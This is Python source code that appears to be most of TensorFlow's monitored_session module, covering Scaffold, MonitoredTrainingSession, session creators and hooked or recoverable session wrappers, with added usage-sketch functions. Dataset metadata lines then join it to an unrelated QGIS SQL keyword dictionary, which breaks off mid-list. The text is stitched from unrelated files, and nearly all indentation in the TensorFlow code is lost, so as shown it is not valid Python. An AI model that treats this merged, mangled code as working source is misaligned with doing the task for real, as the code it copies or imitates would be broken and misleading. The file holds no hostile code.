from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver as training_saver
from tensorflow.python.training import session_manager as sm
from tensorflow.python.training import session_run_hook
# TODO(touts): Share that with the Supervisor.
class Scaffold(object):
"""Structure to create or gather pieces commonly needed to train a model.
When you build a model for training you usually need ops to initialize
variables, a `Saver` to checkpoint them, an op to collect summaries for
the visualizer, and so on.
Various libraries built on top of the core TensorFlow library take care of
creating some or all of these pieces and storing them in well known
collections in the graph. The `Scaffold` class helps pick these pieces from
the graph collections, creating and adding them to the collections if needed.
If you call the scaffold constructor without any arguments, it will pick
pieces from the collections, creating default ones if needed when
`scaffold.finalize()` is called. You can pass arguments to the constructor to
provide your own pieces. Pieces that you pass to the constructor are not
added to the graph collections.
The following pieces are directly accessible as attributes of the `Scaffold`
object:
* `saver`: A `tf.Saver` object taking care of saving the variables. Picked
from and stored into the `SAVERS` collection in the graph by default.
* `init_op`: An op to run to initialize the variables. Picked from and
stored into the `INIT_OP` collection in the graph by default.
* `ready_op`: An op to verify that the variables are initialized. Picked
from and stored into the `READY_OP` collection in the graph by default.
* `ready_for_local_init_op`: An op to verify that global state has been
initialized and it is alright to run `local_init_op`. Picked from and
stored into the `READY_FOR_LOCAL_INIT_OP` collection in the graph by
default. This is needed when the initialization of local variables depends
on the values of global variables.
* `local_init_op`: An op to initialize the local variables. Picked
from and stored into the `LOCAL_INIT_OP` collection in the graph by default.
* `summary_op`: An op to run and merge the summaries in the graph. Picked
from and stored into the `SUMMARY_OP` collection in the graph by default.
* `global_step`: A tensor containing the global step counter. Picked
from and stored into the `GLOBAL_STEP` collection in the graph by default.
You can also pass the following additional pieces to the constructor:
  * `init_feed_dict`: A session feed dictionary that should be used when
running the init op.
  * `init_fn`: A callable to run after the init op to perform additional
initializations. The callable will be called as
`init_fn(scaffold, session)`.
"""
def __init__(self,
init_op=None,
init_feed_dict=None,
init_fn=None,
ready_op=None,
ready_for_local_init_op=None,
local_init_op=None,
summary_op=None,
saver=None):
"""Create a scaffold.
Args:
init_op: Optional op for initializing variables.
init_feed_dict: Optional session feed dictionary to use when running the
init_op.
init_fn: Optional function to use to initialize the model after running
the init_op. Will be called as `init_fn(scaffold, session)`.
ready_op: Optional op to verify that the variables are initialized. Must
return an empty 1D string tensor when the variables are initialized, or
a non-empty 1D string tensor listing the names of the non-initialized
variables.
ready_for_local_init_op: Optional op to verify that the global variables
are initialized and `local_init_op` can be run. Must return an empty
1D string tensor when the global variables are initialized, or a
non-empty 1D string tensor listing the names of the non-initialized
global variables.
local_init_op: Optional op to initialize local variables.
summary_op: Optional op to gather all summaries. Must return a scalar
string tensor containing a serialized `Summary` proto.
saver: Optional `tf.Saver` object to use to save and restore variables.
"""
# NOTE(touts): modifying the init function to be passed the scaffold is a
# hack to make it easy to find the saver. Is there a better way?
if init_fn:
self._init_fn = lambda sess: init_fn(self, sess)
else:
self._init_fn = None
self._init_op = init_op
self._ready_op = ready_op
self._ready_for_local_init_op = ready_for_local_init_op
self._local_init_op = local_init_op
self._summary_op = summary_op
self._saver = saver
self._init_feed_dict = init_feed_dict
def finalize(self):
"""Creates operations if needed and finalizes the graph."""
if self._init_op is None:
def default_init_op():
return control_flow_ops.group(
variables.global_variables_initializer(),
resources.initialize_resources(resources.shared_resources()))
self._init_op = Scaffold.get_or_default(
'init_op',
ops.GraphKeys.INIT_OP,
default_init_op)
if self._ready_op is None:
def default_ready_op():
return array_ops.concat([
variables.report_uninitialized_variables(),
resources.report_uninitialized_resources()
], 0)
self._ready_op = Scaffold.get_or_default(
'ready_op', ops.GraphKeys.READY_OP,
default_ready_op)
if self._ready_for_local_init_op is None:
def default_ready_for_local_init_op():
return variables.report_uninitialized_variables(
variables.global_variables())
self._ready_for_local_init_op = Scaffold.get_or_default(
'ready_for_local_init_op', ops.GraphKeys.READY_FOR_LOCAL_INIT_OP,
default_ready_for_local_init_op)
if self._local_init_op is None:
self._local_init_op = Scaffold.get_or_default(
'local_init_op', ops.GraphKeys.LOCAL_INIT_OP,
Scaffold._default_local_init_op)
if self._summary_op is None:
self._summary_op = Scaffold.get_or_default('summary_op',
ops.GraphKeys.SUMMARY_OP,
summary.merge_all)
# pylint: disable=g-long-lambda
if self._saver is None:
self._saver = Scaffold.get_or_default(
'saver',
ops.GraphKeys.SAVERS,
lambda: training_saver.Saver(sharded=True, allow_empty=True,
write_version=saver_pb2.SaverDef.V2))
# pylint: enable=g-long-lambda
self._saver.build()
ops.get_default_graph().finalize()
return self
@property
def init_fn(self):
return self._init_fn
@property
def init_op(self):
return self._init_op
@property
def ready_op(self):
return self._ready_op
@property
def ready_for_local_init_op(self):
return self._ready_for_local_init_op
@property
def local_init_op(self):
return self._local_init_op
@property
def summary_op(self):
return self._summary_op
@property
def saver(self):
return self._saver
@property
def init_feed_dict(self):
return self._init_feed_dict
@staticmethod
def get_or_default(arg_name, collection_key, default_constructor):
"""Get from cache or create a default operation."""
elements = ops.get_collection(collection_key)
if elements:
if len(elements) > 1:
raise RuntimeError('More than one item in the collection "%s". '
'Please indicate which one to use by passing it to '
'the tf.Scaffold constructor as: '
'tf.Scaffold(%s=item to use)', collection_key,
arg_name)
return elements[0]
op = default_constructor()
if op is not None:
ops.add_to_collection(collection_key, op)
return op
@staticmethod
def _default_local_init_op():
return control_flow_ops.group(variables.local_variables_initializer(),
data_flow_ops.tables_initializer())
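# --- Usage sketch (not part of the original module) --------------------------
# A minimal, hedged example of supplying a custom `init_fn` to a `Scaffold`;
# the helper name below is illustrative only and is never called here.
def _example_scaffold_with_init_fn():
  """Builds a Scaffold whose init_fn logs once variables are initialized."""
  def _init_fn(scaffold, session):
    # The scaffold passes itself to the callable, so pieces such as
    # `scaffold.saver` are available during initialization.
    logging.info('Model initialized; saver: %s', scaffold.saver)
  return Scaffold(init_fn=_init_fn)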
def MonitoredTrainingSession(master='', # pylint: disable=invalid-name
is_chief=True,
checkpoint_dir=None,
scaffold=None,
hooks=None,
chief_only_hooks=None,
save_checkpoint_secs=600,
save_summaries_steps=100,
save_summaries_secs=None,
config=None):
"""Creates a `MonitoredSession` for training.
For a chief, this utility sets proper session initializer/restorer. It also
creates hooks related to checkpoint and summary saving. For workers, this
utility sets proper session creator which waits for the chief to
  initialize/restore.
Args:
master: `String` the TensorFlow master to use.
    is_chief: If `True`, it will take care of initialization and recovery of the
underlying TensorFlow session. If `False`, it will wait on a chief to
initialize or recover the TensorFlow session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified, a default one is created. It's used to finalize the graph.
hooks: Optional list of `SessionRunHook` objects.
chief_only_hooks: list of `SessionRunHook` objects. Activate these hooks if
`is_chief==True`, ignore otherwise.
save_checkpoint_secs: The frequency, in seconds, that a checkpoint is saved
using a default checkpoint saver. If `save_checkpoint_secs` is set to
`None`, then the default checkpoint saver isn't used.
save_summaries_steps: The frequency, in number of global steps, that the
summaries are written to disk using a default summary saver. If both
`save_summaries_steps` and `save_summaries_secs` are set to `None`, then
the default summary saver isn't used.
save_summaries_secs: The frequency, in secs, that the summaries are written
to disk using a default summary saver. If both `save_summaries_steps` and
`save_summaries_secs` are set to `None`, then the default summary saver
isn't used.
config: an instance of `tf.ConfigProto` proto used to configure the session.
It's the `config` argument of constructor of `tf.Session`.
Returns:
A `MonitoredSession` object.
"""
scaffold = scaffold or Scaffold()
if not is_chief:
session_creator = WorkerSessionCreator(
scaffold=scaffold, master=master, config=config)
return MonitoredSession(session_creator=session_creator, hooks=hooks or [])
all_hooks = []
if chief_only_hooks:
all_hooks.extend(chief_only_hooks)
session_creator = ChiefSessionCreator(
scaffold=scaffold,
checkpoint_dir=checkpoint_dir,
master=master,
config=config)
if checkpoint_dir:
all_hooks.append(
basic_session_run_hooks.StepCounterHook(output_dir=checkpoint_dir))
if (save_summaries_steps and save_summaries_steps > 0) or (
save_summaries_secs and save_summaries_secs > 0):
all_hooks.append(basic_session_run_hooks.SummarySaverHook(
scaffold=scaffold,
save_steps=save_summaries_steps,
save_secs=save_summaries_secs,
output_dir=checkpoint_dir))
if save_checkpoint_secs and save_checkpoint_secs > 0:
all_hooks.append(basic_session_run_hooks.CheckpointSaverHook(
checkpoint_dir, save_secs=save_checkpoint_secs, scaffold=scaffold))
if hooks:
all_hooks.extend(hooks)
return MonitoredSession(session_creator=session_creator, hooks=all_hooks)
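# --- Usage sketch (not part of the original module) --------------------------
# A hedged illustration of the training-loop pattern this helper targets;
# `train_op` and `checkpoint_dir` are placeholders supplied by the caller.
def _example_training_loop(train_op, checkpoint_dir):
  with MonitoredTrainingSession(is_chief=True,
                                checkpoint_dir=checkpoint_dir) as sess:
    while not sess.should_stop():
      sess.run(train_op)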
class SessionCreator(object):
"""A factory for tf.Session."""
@abc.abstractmethod
def create_session(self):
raise NotImplementedError(
'create_session is not implemented for {}.'.format(self))
class ChiefSessionCreator(SessionCreator):
"""Creates a tf.Session for a chief."""
def __init__(self,
scaffold=None,
master='',
config=None,
checkpoint_dir=None,
checkpoint_filename_with_path=None):
"""Initializes a chief session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
checkpoint_filename_with_path: Full file name path to the checkpoint file.
"""
self._checkpoint_dir = checkpoint_dir
self._checkpoint_filename_with_path = checkpoint_filename_with_path
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().prepare_session(
self._master,
saver=self._scaffold.saver,
checkpoint_dir=self._checkpoint_dir,
checkpoint_filename_with_path=self._checkpoint_filename_with_path,
config=self._config,
init_op=self._scaffold.init_op,
init_feed_dict=self._scaffold.init_feed_dict,
init_fn=self._scaffold.init_fn)
class WorkerSessionCreator(SessionCreator):
"""Creates a tf.Session for a worker."""
def __init__(self, scaffold=None, master='', config=None):
"""Initializes a worker session creator.
Args:
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
"""
self._scaffold = scaffold or Scaffold()
self._session_manager = None
self._master = master
self._config = config
def _get_session_manager(self):
if self._session_manager:
return self._session_manager
self._session_manager = sm.SessionManager(
local_init_op=self._scaffold.local_init_op,
ready_op=self._scaffold.ready_op,
ready_for_local_init_op=self._scaffold.ready_for_local_init_op,
graph=ops.get_default_graph())
return self._session_manager
def create_session(self):
self._scaffold.finalize()
return self._get_session_manager().wait_for_session(
self._master, config=self._config)
class _MonitoredSession(object):
"""See `MonitoredSession` or `SingularMonitoredSession`."""
def __init__(self, session_creator, hooks, should_recover):
"""Sets up a Monitored or Hooked Session.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` or a `WorkerSessionCreator`.
      hooks: An iterable of `SessionRunHook` objects.
should_recover: A bool. Indicates whether to recover from `AbortedError`
or not.
"""
self._graph_was_finalized = ops.get_default_graph().finalized
self._hooks = hooks or []
for h in self._hooks:
h.begin()
# Create the session.
self._coordinated_creator = self._CoordinatedSessionCreator(
session_creator=session_creator or ChiefSessionCreator(),
hooks=self._hooks)
if should_recover:
self._sess = _RecoverableSession(self._coordinated_creator)
else:
self._sess = self._coordinated_creator.create_session()
@property
def graph(self):
"""The graph that was launched in this session."""
if self._tf_sess() is None:
return None
return self._tf_sess().graph
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Run ops in the monitored session.
This method is completely compatible with the `tf.Session.run()` method.
Args:
fetches: Same as `tf.Session.run()`.
feed_dict: Same as `tf.Session.run()`.
options: Same as `tf.Session.run()`.
run_metadata: Same as `tf.Session.run()`.
Returns:
Same as `tf.Session.run()`.
"""
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
def should_stop(self):
if self._sess:
return self._sess.should_stop()
return True
def close(self):
self._close_internal()
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if exception_type in [errors.OutOfRangeError, StopIteration]:
exception_type = None
self._close_internal(exception_type)
# __exit__ should return True to suppress an exception.
return exception_type is None
class _CoordinatedSessionCreator(object):
"""Factory for the _RecoverableSession."""
def __init__(self, session_creator, hooks):
self._session_creator = session_creator
self._hooks = hooks
self.coord = None
self.tf_sess = None
def create_session(self):
"""Creates a coordinated session."""
# Keep the tf_sess for unit testing.
self.tf_sess = self._session_creator.create_session()
# We don't want coordinator to suppress any exception.
self.coord = coordinator.Coordinator(clean_stop_exception_types=[])
queue_runner.start_queue_runners(sess=self.tf_sess, coord=self.coord)
# Inform the hooks that a new session has been created.
for hook in self._hooks:
hook.after_create_session(self.tf_sess, self.coord)
return _CoordinatedSession(
_HookedSession(self.tf_sess, self._hooks), self.coord)
def _close_internal(self, exception_type=None):
try:
if not exception_type:
for h in self._hooks:
h.end(self._coordinated_creator.tf_sess)
finally:
try:
self._sess.close()
finally:
self._sess = None
self._coordinated_creator.tf_sess = None
self._coordinated_creator.coord = None
if not self._graph_was_finalized:
ops.get_default_graph()._unsafe_unfinalize() # pylint: disable=protected-access
def _is_closed(self):
"""Return True if the supervised session is closed. For tests only.
Returns:
A boolean.
"""
return self._coordinated_creator.tf_sess is None
def _tf_sess(self):
return self._coordinated_creator.tf_sess
class MonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, recovery and hooks.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummaryHook(...)
with MonitoredSession(session_creator=ChiefSessionCreator(...),
hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
  Initialization: At creation time the monitored session does the following
  things in the given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* create session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
  Run: When `run()` is called, the monitored session does the following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns result of `session.run()` asked by user
* if `AbortedError` occurs, it recovers or reinitializes the session before
executing the run() call again
  Exit: At the `close()`, the monitored session does the following things in order:
* calls `hook.end()`
* closes the queue runners and the session
* suppresses `OutOfRange` error which indicates that all inputs have been
processed if the monitored_session is used as a context
How to set `tf.Session` arguments:
* In most cases you can set session arguments as follows:
```python
MonitoredSession(
session_creator=ChiefSessionCreator(master=..., config=...))
```
* In distributed setting for a non-chief worker, you can use following:
```python
MonitoredSession(
session_creator=WorkerSessionCreator(master=..., config=...))
```
See `MonitoredTrainingSession` for an example usage based on chief or worker.
Args:
session_creator: A factory object to create session. Typically a
`ChiefSessionCreator` which is the default one.
    hooks: An iterable of `SessionRunHook` objects.
Returns:
A MonitoredSession object.
"""
def __init__(self, session_creator=None, hooks=None):
super(MonitoredSession, self).__init__(
session_creator, hooks, should_recover=True)
class SingularMonitoredSession(_MonitoredSession):
"""Session-like object that handles initialization, restoring, and hooks.
Please note that this utility is not recommended for distributed settings.
For distributed settings, please use `tf.train.MonitoredSession`. The
differences between `MonitoredSession` and `SingularMonitoredSession` are:
* `MonitoredSession` handles `AbortedError` for distributed settings,
but `SingularMonitoredSession` does not.
* `MonitoredSession` can be created in `chief` or `worker` modes.
`SingularMonitoredSession` is always created as `chief`.
* You can access the raw `tf.Session` object used by
`SingularMonitoredSession`, whereas in MonitoredSession the raw session is
private. This can be used:
- To `run` without hooks.
- To save and restore.
* All other functionality is identical.
Example usage:
```python
saver_hook = CheckpointSaverHook(...)
summary_hook = SummaryHook(...)
with SingularMonitoredSession(hooks=[saver_hook, summary_hook]) as sess:
while not sess.should_stop():
sess.run(train_op)
```
  Initialization: At creation time the hooked session does the following
  things in the given order:
* calls `hook.begin()` for each given hook
* finalizes the graph via `scaffold.finalize()`
* create session
* initializes the model via initialization ops provided by `Scaffold`
* restores variables if a checkpoint exists
* launches queue runners
  Run: When `run()` is called, the hooked session does the following things:
* calls `hook.before_run()`
* calls TensorFlow `session.run()` with merged fetches and feed_dict
* calls `hook.after_run()`
* returns result of `session.run()` asked by user
  Exit: At the `close()`, the hooked session does the following things in order:
* calls `hook.end()`
* closes the queue runners and the session
  * suppresses `OutOfRange` error which indicates that all inputs have been
processed if the `SingularMonitoredSession` is used as a context.
"""
def __init__(self,
hooks=None,
scaffold=None,
master='',
config=None,
checkpoint_dir=None):
"""Creates a SingularMonitoredSession.
Args:
      hooks: An iterable of `SessionRunHook` objects.
scaffold: A `Scaffold` used for gathering or building supportive ops. If
not specified a default one is created. It's used to finalize the graph.
master: `String` representation of the TensorFlow master to use.
config: `ConfigProto` proto used to configure the session.
checkpoint_dir: A string. Optional path to a directory where to restore
variables.
"""
session_creator = ChiefSessionCreator(
scaffold=scaffold,
master=master,
config=config,
checkpoint_dir=checkpoint_dir)
super(SingularMonitoredSession, self).__init__(
session_creator, hooks, should_recover=False)
def raw_session(self):
"""Returns underlying `TensorFlow.Session` object."""
return self._tf_sess()
class _WrappedSession(object):
"""Wrapper around a `tf.Session`.
This wrapper is used as a base class for various session wrappers
that provide additional functionality such as monitoring, coordination,
and recovery.
In addition to the methods exported by `SessionInterface` the wrapper
provides a method to check for stop and never raises exceptions from
calls to `close()`.
"""
def __init__(self, sess):
"""Creates a `_WrappedSession`.
Args:
sess: A `tf.Session` or `_WrappedSession` object. The wrapped session.
"""
self._sess = sess
self._wrapped_is_stoppable = isinstance(self._sess, _WrappedSession)
@property
def graph(self):
return self._sess.graph
@property
def sess_str(self):
return self._sess.sess_str
def should_stop(self):
"""Return true if this session should not be used anymore.
Always return True if the session was closed.
Returns:
True if the session should stop, False otherwise.
"""
if self._check_stop():
return True
if self._sess:
return self._wrapped_is_stoppable and self._sess.should_stop()
return True
def _check_stop(self):
"""Hook for subclasses to provide their own stop condition.
Returns:
True if the session should stop, False otherwise.
"""
return False
def close(self):
if self._sess:
try:
self._sess.close()
finally:
self._sess = None
def run(self, *args, **kwargs):
return self._sess.run(*args, **kwargs)
class _RecoverableSession(_WrappedSession):
"""A wrapped session that recreates a session on `tf.errors.AbortedError`.
The constructor is passed a SessionCreator object, not a session.
Calls to `run()` are delegated to the wrapped session. If a call raises the
exception `tf.errors.AbortedError`, the wrapped session is closed, and a new
one is created by calling the factory again.
"""
def __init__(self, sess_creator):
"""Create a new `_RecoverableSession`.
The value returned by calling `sess_creator.create_session()` will be the
session wrapped by this recoverable session.
Args:
sess_creator: A 'SessionCreator' to be wrapped by recoverable.
"""
self._sess_creator = sess_creator
_WrappedSession.__init__(self, self._create_session())
def _create_session(self):
while True:
try:
return self._sess_creator.create_session()
except errors.AbortedError:
logging.info('An AbortedError was raised during initialization. '
'It\'s most likely due to a preemption in a connected '
'worker/ps. A new session will be created.')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
while True:
try:
if not self._sess:
self._sess = self._create_session()
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
except errors.AbortedError:
logging.info('An AbortedError was raised. Closing the current session. '
'It\'s most likely due to a preemption in a connected '
'worker/ps. '
'A new session will be created on the next session.run().')
self.close()
self._sess = None
class _CoordinatedSession(_WrappedSession):
"""A wrapped session that works with a `tf.Coordinator`.
Calls to `run()` are delegated to the wrapped session. If a call
raises an exception, the exception is reported to the coordinator.
  In addition, after each call to `run()` this session asks the coordinator if
  the session should stop. In that case it will join all the threads
registered with the coordinator before returning.
If the coordinator was requested to stop with an exception, that exception
will be re-raised from the call to `run()`.
"""
def __init__(self, sess, coord):
"""Create a new `_CoordinatedSession`.
Args:
sess: A `tf.Session` object. The wrapped session.
coord: A `tf.train.Coordinator` object.
"""
_WrappedSession.__init__(self, sess)
self._coord = coord
def _check_stop(self):
# Check with the coordinator if we should stop.
return self._coord.should_stop()
def close(self):
self._coord.request_stop()
try:
self._coord.join()
finally:
try:
_WrappedSession.close(self)
except Exception: # pylint: disable=broad-except
# We intentionally suppress exceptions from the close() here since
# useful exceptions are already reported by join().
pass
class _HookedSession(_WrappedSession):
"""A _WrappedSession that calls hooks during calls to run().
The list of hooks to call is passed in the constructor. Before each call
to `run()` the session calls the `before_run()` method of the hooks, which
can return additional ops or tensors to run. These are added to the arguments
of the call to `run()`.
When the `run()` call finishes, the session calls the `after_run()` methods of
the hooks, passing the values returned by the `run()` call corresponding to
the ops and tensors that each hook requested.
  If any of the hooks requests a stop via run_context, the session will be
marked as needing to stop and its `should_stop()` method will now return
`True`.
"""
def __init__(self, sess, hooks):
"""Initializes a _HookedSession object.
Args:
sess: A `tf.Session` or a `_WrappedSession` object.
      hooks: An iterable of `SessionRunHook` objects.
"""
_WrappedSession.__init__(self, sess)
self._hooks = hooks
self._should_stop = False
def _check_stop(self):
"""See base class."""
return self._should_stop
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""See base class."""
if self.should_stop():
raise RuntimeError('Run called even after should_stop requested.')
actual_fetches = {'caller': fetches}
run_context = session_run_hook.SessionRunContext(
original_args=session_run_hook.SessionRunArgs(fetches, feed_dict),
session=self._sess)
options = options or config_pb2.RunOptions()
feed_dict = self._call_hook_before_run(run_context, actual_fetches,
feed_dict, options)
# Do session run.
run_metadata = run_metadata or config_pb2.RunMetadata()
outputs = _WrappedSession.run(self,
fetches=actual_fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
for hook in self._hooks:
hook.after_run(
run_context,
session_run_hook.SessionRunValues(
results=outputs[hook] if hook in outputs else None,
options=options,
run_metadata=run_metadata))
self._should_stop = self._should_stop or run_context.stop_requested
return outputs['caller']
def _call_hook_before_run(self, run_context, fetch_dict, user_feed_dict,
options):
"""Calls hooks.before_run and handles requests from hooks."""
hook_feeds = {}
for hook in self._hooks:
request = hook.before_run(run_context)
if request is not None:
if request.fetches is not None:
fetch_dict[hook] = request.fetches
if request.feed_dict:
self._raise_if_feeds_intersects(
hook_feeds, request.feed_dict,
'Same tensor is fed by two hooks.')
hook_feeds.update(request.feed_dict)
if request.options:
self._merge_run_options(options, request.options)
if not hook_feeds:
return user_feed_dict
if not user_feed_dict:
return hook_feeds
self._raise_if_feeds_intersects(
user_feed_dict, hook_feeds,
'Same tensor is fed by a SessionRunHook and user.')
hook_feeds.update(user_feed_dict)
return hook_feeds
def _raise_if_feeds_intersects(self, feeds1, feeds2, message):
intersection = set(feeds1.keys()) & set(feeds2.keys())
if intersection:
raise RuntimeError(message + ' Conflict(s): ' + str(list(intersection)))
def _merge_run_options(self, options, incoming_options):
"""Merge two instances of RunOptions into the first one.
During the merger, the numerical fields including trace_level,
timeout_in_ms, inter_op_thread_pool are set to the larger one of the two.
The boolean value is set to the logical OR of the two.
debug_tensor_watch_opts of the original options is extended with that from
the incoming one.
Args:
options: The options to merge into.
incoming_options: The options to be merged into the first argument.
"""
options.trace_level = max(options.trace_level, incoming_options.trace_level)
options.timeout_in_ms = max(options.timeout_in_ms,
incoming_options.timeout_in_ms)
options.inter_op_thread_pool = max(options.inter_op_thread_pool,
incoming_options.inter_op_thread_pool)
options.output_partition_graphs = max(
options.output_partition_graphs,
incoming_options.output_partition_graphs)
options.debug_options.debug_tensor_watch_opts.extend(
incoming_options.debug_options.debug_tensor_watch_opts)
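# --- Usage sketch (not part of the original module) --------------------------
# A hedged example of the hook protocol consumed by `_HookedSession`; the hook
# below merely counts `run()` calls and its name is illustrative only.
class _ExampleRunCounterHook(session_run_hook.SessionRunHook):
  """Counts how many times the hooked session's `run()` was called."""
  def begin(self):
    self._run_count = 0
  def after_run(self, run_context, run_values):
    self._run_count += 1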
|
apache-2.0
|
boundlessgeo/QGIS
|
python/plugins/db_manager/db_plugins/postgis/sql_dictionary.py
|
29
|
13470
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
sql_dictionary.py
---------------------
Date : April 2012
Copyright : (C) 2012 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import map
__author__ = 'Giuseppe Sucameli'
__date__ = 'April 2012'
__copyright__ = '(C) 2012, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
# keywords
keywords = [
# TODO get them from a reference page
"action", "add", "after", "all", "alter", "analyze", "and", "as", "asc",
"before", "begin", "between", "by", "cascade", "case", "cast", "check",
"collate", "column", "commit", "constraint", "create", "cross", "current_date",
"current_time", "current_timestamp", "default", "deferrable", "deferred",
"delete", "desc", "distinct", "drop", "each", "else", "end", "escape",
"except", "exists", "for", "foreign", "from", "full", "group", "having",
"ignore", "immediate", "in", "initially", "inner", "insert", "intersect",
"into", "is", "isnull", "join", "key", "left", "like", "limit", "match",
"natural", "no", "not", "notnull", "null", "of", "offset", "on", "or", "order",
"outer", "primary", "references", "release", "restrict", "right", "rollback",
"row", "savepoint", "select", "set", "table", "temporary", "then", "to",
"transaction", "trigger", "union", "unique", "update", "using", "values",
"view", "when", "where",
"absolute", "admin", "aggregate", "alias", "allocate", "analyse", "any", "are",
"array", "asensitive", "assertion", "asymmetric", "at", "atomic",
"authorization", "avg", "bigint", "binary", "bit", "bit_length", "blob",
"boolean", "both", "breadth", "call", "called", "cardinality", "cascaded",
"catalog", "ceil", "ceiling", "char", "character", "character_length",
"char_length", "class", "clob", "close", "coalesce", "collation", "collect",
"completion", "condition", "connect", "connection", "constraints",
"constructor", "continue", "convert", "corr", "corresponding", "count",
"covar_pop", "covar_samp", "cube", "cume_dist", "current",
"current_default_transform_group", "current_path", "current_role",
"current_transform_group_for_type", "current_user", "cursor", "cycle", "data",
"date", "day", "deallocate", "dec", "decimal", "declare", "dense_rank",
"depth", "deref", "describe", "descriptor", "destroy", "destructor",
"deterministic", "diagnostics", "dictionary", "disconnect", "do", "domain",
"double", "dynamic", "element", "end-exec", "equals", "every", "exception",
"exec", "execute", "exp", "external", "extract", "false", "fetch", "filter",
"first", "float", "floor", "found", "free", "freeze", "function", "fusion",
"general", "get", "global", "go", "goto", "grant", "grouping", "hold", "host",
"hour", "identity", "ilike", "indicator", "initialize", "inout", "input",
"insensitive", "int", "integer", "intersection", "interval", "isolation",
"iterate", "language", "large", "last", "lateral", "leading", "less", "level",
"ln", "local", "localtime", "localtimestamp", "locator", "lower", "map", "max",
"member", "merge", "method", "min", "minute", "mod", "modifies", "modify",
"module", "month", "multiset", "names", "national", "nchar", "nclob", "new",
"next", "none", "normalize", "nullif", "numeric", "object", "octet_length",
"off", "old", "only", "open", "operation", "option", "ordinality", "out",
"output", "over", "overlaps", "overlay", "pad", "parameter", "parameters",
"partial", "partition", "path", "percentile_cont", "percentile_disc",
"percent_rank", "placing", "position", "postfix", "power", "precision",
"prefix", "preorder", "prepare", "preserve", "prior", "privileges",
"procedure", "public", "range", "rank", "read", "reads", "real", "recursive",
"ref", "referencing", "regr_avgx", "regr_avgy", "regr_count", "regr_intercept",
"regr_r2", "regr_slope", "regr_sxx", "regr_sxy", "regr_syy", "relative",
"result", "return", "returning", "returns", "revoke", "role", "rollup",
"routine", "rows", "row_number", "schema", "scope", "scroll", "search",
"second", "section", "sensitive", "sequence", "session", "session_user",
"sets", "similar", "size", "smallint", "some", "space", "specific",
"specifictype", "sql", "sqlcode", "sqlerror", "sqlexception", "sqlstate",
"sqlwarning", "sqrt", "start", "state", "statement", "static", "stddev_pop",
"stddev_samp", "structure", "submultiset", "substring", "sum", "symmetric",
"system", "system_user", "tablesample", "terminate", "than", "time",
"timestamp", "timezone_hour", "timezone_minute", "trailing", "translate",
"translation", "treat", "trim", "true", "uescape", "under", "unknown",
"unnest", "upper", "usage", "user", "value", "varchar", "variable", "varying",
"var_pop", "var_samp", "verbose", "whenever", "width_bucket", "window", "with",
"within", "without", "work", "write", "xml", "xmlagg", "xmlattributes",
"xmlbinary", "xmlcomment", "xmlconcat", "xmlelement", "xmlforest",
"xmlnamespaces", "xmlparse", "xmlpi", "xmlroot", "xmlserialize", "year", "zone"
]
postgis_keywords = []
# functions
functions = [
"coalesce",
"nullif", "quote", "random",
"replace", "soundex"
]
operators = [
' AND ', ' OR ', '||', ' < ', ' <= ', ' > ', ' >= ', ' = ', ' <> ', ' IS ', ' IS NOT ', ' IN ', ' LIKE ', ' GLOB ', ' MATCH ', ' REGEXP '
]
math_functions = [
# SQL math functions
"Abs", "ACos", "ASin", "ATan", "Cos", "Cot", "Degrees", "Exp", "Floor", "Log", "Log2",
"Log10", "Pi", "Radians", "Round", "Sign", "Sin", "Sqrt", "StdDev_Pop", "StdDev_Samp", "Tan",
"Var_Pop", "Var_Samp"]
string_functions = ["Length", "Lower", "Upper", "Like", "Trim", "LTrim", "RTrim", "Replace", "Substr"]
aggregate_functions = [
"Max", "Min", "Avg", "Count", "Sum", "Group_Concat", "Total", "Var_Pop", "Var_Samp", "StdDev_Pop", "StdDev_Samp"
]
postgis_functions = [ # from http://www.postgis.org/docs/reference.html
# 7.1. PostgreSQL PostGIS Types
"*box2d", "*box3d", "*box3d_extent", "*geometry", "*geometry_dump", "*geography",
